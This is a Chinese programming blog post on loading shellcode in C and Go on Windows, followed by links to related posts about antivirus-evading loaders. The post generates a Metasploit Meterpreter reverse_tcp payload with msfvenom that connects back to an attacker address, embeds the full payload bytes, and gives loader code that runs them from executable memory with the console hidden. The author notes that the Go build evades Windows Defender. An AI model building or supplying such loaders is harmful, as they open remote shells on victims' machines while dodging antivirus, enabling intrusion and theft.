用C和Go语言加载shellcode

已于 2022-02-26 11:21:34 修改
阅读量1k 收藏 1
点赞数
文章标签: c语言 golang 开发语言
于 2022-02-26 11:17:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45744832/article/details/123147035
版权

用C加载

//kali or parrot os
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.100.1 lport=5555 -f c

shellcode.c如下

#include <Windows.h>
#include <stdio.h>
#include <string.h>

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口

//此处为shellcode
unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\x6e\x76\x92\x1a\xaa\xac\x66\xd2\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x92\x3e\x11\xfe\x5a\x44"
"\xaa\xd2\x6e\x76\xd3\x4b\xeb\xfc\x34\x9a\x5f\xa4\xf7\x52\x21"
"\xfe\x06\x9a\xe5\x24\x8a\x4b\xfc\xe4\xed\x80\x4e\x3e\x19\x68"
"\xfa\xe1\x57\x1b\x26\x79\x25\x50\xe0\xe4\x57\x12\xc2\x4a\xf3"
"\x66\xa8\x80\x46\x93\xaf\xbf\x9f\x5b\xab\x6d\x84\x3f\x3c\x37"
"\xc3\x52\x21\xfe\x46\x59\x2c\x4a\xda\x1b\x7a\xca\xe7\xaa\x76"
"\x7d\x90\x15\x2f\xde\x66\xd2\x6e\xfd\x12\x92\xaa\xac\x66\x9a"
"\xeb\xb6\xe6\x7d\xe2\xad\xb6\x59\x26\x6e\xc2\x5e\x21\xec\x46"
"\x9b\x6f\xa6\x71\x4c\xe7\x9d\xaf\x9a\x91\xbf\xd3\x91\x9e\x24"
"\x2e\xd3\xb8\x3e\xa3\xda\x06\xed\xa7\x1b\x63\x37\x93\xdb\x92"
"\x4c\x13\x23\x22\x75\xde\x3e\xa2\xe9\x5f\x03\x1b\xae\xca\x5e"
"\x21\xec\x42\x9b\x6f\xa6\xf4\x5b\x21\xa0\x2e\x96\xe5\x36\x8e"
"\x53\xab\x7c\x27\x59\x6a\xfe\xd3\x42\xe2\xad\xb6\x93\x36\x28"
"\xcb\x40\xeb\xf4\x27\x8b\x2f\x2c\xda\x99\x46\x8c\x27\x80\x91"
"\x96\xca\x5b\xf3\xf6\x2e\x59\x7c\x9f\xd9\xe5\x55\x53\x3b\x9b"
"\xd0\x01\xe1\x28\xf5\x9f\x54\xd2\x6e\x37\xc4\x53\x23\x4a\x2e"
"\x53\x82\xd6\x93\x1a\xaa\xe5\xef\x37\x27\xca\x90\x1a\xbf\x1f"
"\xca\xc2\x0a\x77\xd3\x4e\xe3\x25\x82\x9e\xe7\x87\xd3\xa0\xe6"
"\xdb\x40\xd5\x91\xa3\xde\x93\x40\xc4\x67\xd3\x6e\x76\xcb\x5b"
"\x10\x85\xe6\xb9\x6e\x89\x47\x70\xa0\xed\x38\x82\x3e\x3b\xa3"
"\xd3\xe7\x9d\xa6\x9a\x91\xb6\xda\x93\x68\xe4\x99\x12\x26\xff"
"\x53\x5b\x10\x46\x69\x0d\x8e\x89\x47\x52\x23\x6b\x0c\xc2\x2f"
"\x2e\xde\x93\x48\xe4\xef\x2b\x2f\xcc\x0b\xbf\xde\xcd\x99\x07"
"\xeb\xb6\xe6\x10\xe3\x53\xa8\xa7\x8b\x9e\x01\x1a\xaa\xac\x2e"
"\x51\x82\x66\xda\x93\x48\xe1\x57\x1b\x04\x72\xd3\x42\xe2\x25"
"\x9f\x93\xd4\x74\x4b\xd2\xf5\x53\xb3\x51\x96\x76\xec\x4f\xe2"
"\x2f\xa2\xf2\x30\xff\x64\x70\xea\xed\x3f\xba\x6e\x66\x92\x1a"
"\xeb\xf4\x2e\x5b\x9c\x3e\xa3\xd3\xeb\x16\x3e\x76\x3d\x93\x6d"
"\xcf\xe2\x25\xa5\x9b\xe7\xb1\xdf\x2b\x63\xe5\xef\x22\x26\xff"
"\x48\x52\x23\x55\x27\x68\x6c\xaf\x5a\x45\x55\x79\xe5\x2a\x6e"
"\x0b\xba\x42\xeb\xfb\x3f\xba\x6e\x36\x92\x1a\xeb\xf4\x0c\xd2"
"\x34\x37\x28\x11\x85\xa3\x56\x2d\xbb\x21\xcb\x5b\x10\xd9\x08"
"\x9f\x0f\x89\x47\x53\x55\x62\x8f\xee\x91\x89\x6d\x52\xab\x6f"
"\x2e\xfb\xa8\x3e\x17\xec\xdf\x18\x27\x2d\x89\x2e\xf8\x1a\xf3"
"\xe5\xa1\x10\x9e\xc3\x30\x4c\x55\x79\x66\xd2";


main()

{
    char *Memory; 

    Memory=VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    memcpy(Memory, buf, sizeof(buf));

    ((void(*)())Memory)();

}
//不可逃过windows defender检测
//windows下编译
gcc -o shellcode_c.exe shellcode.c

用Go加载

//kali or parrot os
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.100.1 lport=5555 -f hex

shellcode.go如下

package main

import (
	"encoding/hex"
	"syscall"
	"unsafe"
)

var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")

func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool {
	ret, _, _ := procVirtualProtect.Call(
		uintptr(lpAddress),
		uintptr(dwSize),
		uintptr(flNewProtect),
		uintptr(lpflOldProtect))
	return ret > 0
}

func Run(sc []byte) {
	f := func() {}
	var oldfperms uint32
	if !VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&oldfperms)) {
		panic("Call to VirtualProtect failed!")
	}
	**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc))

	var oldshellcodeperms uint32
	if !VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))), uintptr(len(sc)), uint32(0x40), unsafe.Pointer(&oldshellcodeperms)) {
		panic("Call to VirtualProtect failed!")
	}
	f()
}
//sc, _ := hex.DecodeString("...")此处为shellcode
func main() {
	sc, _ := hex.DecodeString("4831c94881e9c0ffffff488d05efffffff48bb257aa12b451f0b6048315827482df8ffffffe2f4d93222cfb5f7c760257ae07a044f592814a8c463ce4d6b28ae28b97a0d9459407332ae9c0f5543eb572aec1a8c573aa08946c05747332b21e4b3ac6a44dee98d773bf063ce4d2beb6746e92a95798a183d71a324c06d0b6025f121a3451f0b28a0bad54c0d1edb24ae3a817b0c1edbeb6d62427d0de0c221ae4e296344c94651ec3290ebe95ecaa9283ba0ea7dff7e916979ed0f4d5a32b150a2f96fce5f2f2924aac76ace134324ae3abd6244cf4aeb21f2e92a955e53217d24f87104474a396420e9a8a93f4a32da9af96a1c4543eb3793ead4bae056299b0dd2191a2c3960253bf762ccf943e1c9daa02b455682856cc6a32b50aca770417be07f0c96ef2cac8be09109682d67daafeda2af770a61257af86aff368b0b258574414f5e5530753790e2082ecb28dabae9a28757f4a06df3606afff504bfc5857463ccd861706422eda2a757829964c0388e317ef4b5a0bad5210ce0c515c092322b451f43e3c96ae9a2a7523aa94f7ee0730d96f2219f7878e31ae0dee3dd7adf7e0d9ccf407bf35741055e5208256aa12b044743e9d73290e204a553c4769f5efe0d96c829acbdec1a8c5682906df37b63cce64ada27a36974baca88982507897304485208253aa12b044761607f3b1b206a103b9ff02df86aff6a652d44857462bad1e25cda855e6344dc4349e33224dd30ab4a9fc222cb2b1c56cca2d5cf037dbaca0b60")
	Run(sc)
}

//可逃过windows defender检测
//windows下编译
//隐藏窗口
go build -ldflags="-H windowsgui -w -s" shellcode.go
丘比特爱睡觉
关注
golang golang-pkg-pcre不支持windows_小玩意:golang加载执行shellcode
weixin_39781594的博客
11-29 307
阅读本文大概需要3分钟,置顶公众号哟。shellcode执行前言今天看到一个比较好玩的东西,虽然原理很简单,但是使用golang来做还是挺新鲜,所以还是分享给大家。第一节PoC、Exp、Payload与Shellcode首先说一下PoC、Exp、Payload与Shellcode这几个概念,这在渗透测试中非常常见。PoC,全称”Proof of Concept”,中文“概念验证”,常指一...
Rust免杀 w Shellcode加载与混淆
S18374的博客
10-25 170
Rust的编译体积是非常小的,虽然比不上C/C++,但是和Python和Go相比优势还是非常大的,并且Rust的热门程度也远小于Python和Go,所以杀软对Rust的检出程度也是非常低的,这都是Rust免杀的天然优势。结合本文章几种基础的加载方式和混淆方式还是可以轻松过一部分杀软的。以下链接是我半年前上传到virustotal的一个样本,半年过去了,目前的检出率为14/71:VirusTotal File(刚上传时检出率为0/71)。
go-shellcode:将Shellcode加载到新进程中
02-06
壳码 这是一个将shellcode作为自己的进程运行的程序,所有程序均来自内存。 这样做是为了击败反病毒检测。 用法 请记住,只有64位shellcode将在64位进程中运行。 这无法自动检测您的Shellcode架构。 使用msfvenom或metasploit以十六进制格式生成一些shellcode: $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444 c:\windows\temp>sc.exe fce8820000006089e531c0648b5030
Golang的Cobalt Strike Shellcode Loader-Golang开发
05-26
Cobalt Strike Shellcode Loader by Golang Doge-Loader Cobalt Strike Shellcode Loader by Golang 本人github的项目可能目前主要分为两大类, :frog: Frog系列为自动化扫描方向, :dog_face: Doge系列为免杀及内网渗透方向 Doge-Loader为Doge系列中较为重要的项目 :dog_face: 本项目感谢朋友gd, skate_zhu的帮助 :dog_face: Doge-Loader 本项目主要作用为Cobalt Strike的shellcode加载器 项目结构如下: main.go 主程序,用于远程下载shellcode加载(需要自行上传shellcode(bin文件)并且修改源码里的url等参数) xor.go 异或编码解码器 /enhancement 附加功能,主要用于免杀等(需自行在main.go中调用) /enhancement/copy.go 程序自删除与自复制 /enhancement/sandbox.go
什么是shellcode加载
最新发布
m0_57836225的博客
08-13 201
在安全领域,恶意的 Shellcode 加载器常用于网络攻击和恶意软件中,对系统的安全构成威胁。4. 执行控制转移:通过某种方式将程序的执行流程转移到已写入的 Shellcode 所在的内存地址,从而开始执行 Shellcode 中的指令。Shellcode 通常是一段精心编写的机器码,用于在目标系统上执行特定的恶意或非恶意操作,比如获取系统权限、执行特定功能等。1. 分配内存:加载器首先在目标进程的内存空间中分配一段可执行的内存区域,用于存储即将加载Shellcode
shellcode加载方式
weixin_50217210的博客
10-16 400
注:lea是“Load Effective Address ”的缩写 --加载有效地址。源文件->添加->资源->导入->CS生成的.bin文件->资源类型(xxx)在resource.h查看资源ID(#define IDR_XXX1)5.线程池等待对象回调函数执行--我最喜欢用的方式。这也是一个优质的执行方法,值得深入研究一下。7.NtTestAlert+APC执行。6.创建纤程(Fiber)执行。纤程是比线程更小的执行单位。
C#加载shellcode
热门推荐
神棍之路
08-25 7万+
using System; using System.Runtime.InteropServices; namespace TCPMeterpreterProcess { class Program { static void Main(string[] args) { // native function’s compile
shellcode加载
10-02
ShellCode_Loader.py”可能是用Python编写的一个脚本,负责加载执行加密的shellcode。Python因其丰富的库和易读性而常被用作快速原型开发或创建复杂工具。这个脚本可能包含了加载、解密shellcode并注入到进程中...
Rust免杀 Shellcode加载与混淆
stopluox的博客
09-19 233
下面是实现AES-CFB加解密的代码,在加密的函数中最终返回的是Hex编码后的字符串,而解密函数最终返回的是Vec数组,同样是为了方便在shellcode loader中读取加密后的shellcode以及加载解密后的shellcode。下面是实现RC4加解密的代码,在加密的函数中最终返回的是Base64编码后的字符串,而解密函数最终返回的是Vec数组,这是为了方便在shellcode loader中读取加密后的shellcode以及加载解密后的shellcode
推荐开源项目:go-shellcode-loader - GO语言实现的混淆免杀Shellcode加载
gitblog_00027的博客
05-29 686
推荐开源项目:go-shellcode-loader - GO语言实现的混淆免杀Shellcode加载器 去发现同类优质开源项目:https://gitcode.com/ 在这个日益复杂的安全环境中,保护代码免受恶意攻击和检测变得至关重要。今天,我们要向您推荐一款强大的开源工具——go-shellcode-loader,这是一款基于GO语言构建的混淆免杀Shellcode加载器,采用AES加密技术...
基于Go加载shellcode
Le1a's Blog
10-21 2432
这里通过TideSec的go免杀项目来从0开始学习首先导个包,需要用到如下几个包。io/ioutil 文件操作os 系统操作syscall syscall包含一个指向底层操作系统原语的接口unsafe Go指针的操作非常有限,仅支持赋值和取值,不支持指针运算,可以通过unsafe包来达到效果这里定义一下变量,然后需要通过syscall来加载两个dll,和ntdll.dll。然后这里有一个检查报错的函数,如果有报错就退出并打印报错信息。
Go4aRun:GO中的Shellcode运行程序,其中包含shellcode加密,远程进程注入,阻止dll和欺骗性的父进程
03-20
Go4aRun 用法: 在hideit.go和Go4it.go中更改用于加密的所需密码 在Go4it.go中更改行为选项 更改块dll行为:通过nonms和onlystore变量在“不允许非MS”和“仅存储”之间 更改parentName变量以更改欺骗的父级 更改programPath变量以更改由父级启动的进程,shellcode将注入该进程 更改creationFlags以更改programPath变量的启动行为 通过注释/取消注释部分CreateRemoteThread或QueueUserAPC选择一个过程注入方法 运行hideit(构建或运行)并选择原始shellcode文件 该脚本应将加密的shellcode保存在pkg / shelly中的shelly.go文件中(如果未手动移动到pkg / shelly中) 编译Go4it.go(例如:GOOS = windows GOARCH
go-shellcode:Windows Shellcode运行程序和支持实用程序的存储库。 应用程序使用各种AP​​I调用或技术来加载执行Shellcode
04-23
去壳代码 go-shellcode是Windows Shellcode运行程序和支持实用程序的存储库。 应用程序使用各种AP​​I调用或技术来加载执行Shellcode。 可用的Shellcode运行程序包括: CreateFiber 该应用程序利用Kernel32.dll的Windows 函数在该应用程序的进程中执行shellcode。 当您希望避免远程进程注入并且希望避免调用CreateThread时,这很有用。 此应用程序不利用golang.org/x/sys/windows软件包中的功能。 最重要的区别是此应用程序本身会加载所有必需的DLL和过程,并使用过程的Call()函数。 注意:我还没有找到退出进程的方法,您将不得不手动终止它。 可以使用以下命令在Windows主机上从项目的根目录编译该应用程序: set GOOS=windows GOARCH=amd64;go
绕过AV:免杀shellcode加载
03-04
旁路AV 条件触发式远控VT 6/70免杀国内杀软及后卫,卡巴斯基等主流杀软 原理 使用 将shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go中的网址替换为您vbs的某个网页或文本(称为网页同样可以,但是需要程序可以正常使用时此网页需要可以访问)编译:go build -ldflags =“-w -s -H = windowsgui”
Shellcode提取、加载与解析
莫慌的博客
03-06 2086
msf的shellcode 如何实现的
记一次Go语言的学习--shellcode加载器免杀
jjjjj34的博客
04-24 2115
在网上搜了很多关于Go语言的免杀,我也是刚学几天,就做个学习对于GO语言做免杀的记录。
c语言添加shellcode到,【转】 使用C语言编写提取通用shellcode的程序
weixin_39876450的博客
05-25 267
该楼层疑似违规已被系统折叠隐藏此楼查看此楼出处:internet修改:Hume/冷雨飘心测试:Win2KSP4Local/Win2003SP0Local注释:我非我[F.S.T]说明:此程序可以用标准c语言string格式打印出你所在ShellCodes函数中编写的shellcode用vc编译时请使用Release格式并取消优化设置,否则不能正常运行*/#include#inclu...
Shellcode与动态加载
tuobaofeng的专栏
05-08 889
.386 .model flat,stdcall option casemap:none include windows.inc .code;代码段 start:;好了我们开始我们的Shellcode代码 push ebp sub esp,100 mov ebp,esp;预留函数地址空间下面我们把动态库基址和函数地址都存在ebp里面 ;**********************
演示几种用C语言执行shellcode(其实也就是机器码)的方式
冷却
09-21 3770
/* * 作者: 冷却 * 时间: 2009年2月21日 * E-mail: leng_que@yahoo.com.cn * 描述: 演示几种用C语言执行shellcode(其实也就是机器码)的方式 * 备注:在WindowsXP SP3下测试成功 *///一段打开Windows计算器(calc.exe)的shellcodeunsig
C/C++加载shellcode免杀技术解析与VT免杀率分析
"这篇文章是Tide安全团队关于C和C++加载shellcode免杀技术的专题,主要讨论如何在安全的环境下使用这些技术进行学习和交流。文章提到了团队的多个安全研究方向,并分享了他们自主研发的安全平台。此外,文章还提供了...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值